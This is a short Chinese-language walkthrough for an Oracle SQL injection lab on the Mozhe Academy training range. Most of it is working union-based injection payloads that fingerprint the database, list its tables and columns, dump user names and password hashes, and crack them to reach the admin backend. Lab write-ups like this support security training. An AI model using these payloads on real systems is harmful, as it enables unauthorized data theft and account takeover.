墨者学院Oracle靶场通关

首先1判断注入点

这⾥通过and 1=1 和and 1=2进⾏判断。

发现存在注入点之后我们开始判断字段数

id=1 order by 2

id=1 order by 3 字段=3页面回显异常 ，说明只存在两个字段

接下来我们开始判断回显点

id=-1 union select 'null','null' from dual

查完之后我们开始用下面的语句查看数据库版本信息

id=-1 union select 'null',(select banner from sys.v_$version where rownum=1) from dual

查询数据库名

id=-1 union select 'null',(select instance_name from V$INSTANCE) from dual

查询数据库表名，查询表名⼀般查询admin或者user表

id=-1 union select 'null',(select table_name from user_tables where rownum=1) from dual

id=-1 union select 'null',(select table_name from user_tables where rownum=1 and table_name not in 'LOGMNR_SESSION_EVOLVE$') from dual

查询字段名信息

id=-1 union select 'null',(select column_name from user_tab_columns where table_name='sns_users' and rownum=1) from dual

查询用户名和密码信息

id=-1 union select USER_NAME,USER_PWD from "sns_users" where rownum=1

id=-1 union select USER_NAME,USER_PWD from "sns_users" where rownum=1 and USER_NAME <> 'zhong'

id=-1 union select USER_NAME,USER_PWD from "sns_users" where rownum=1 and USER_NAME <> 'zhong' and USER_NAME <> 'hu'

得到密码之后我们用md5进行解密之后就可以登录后台了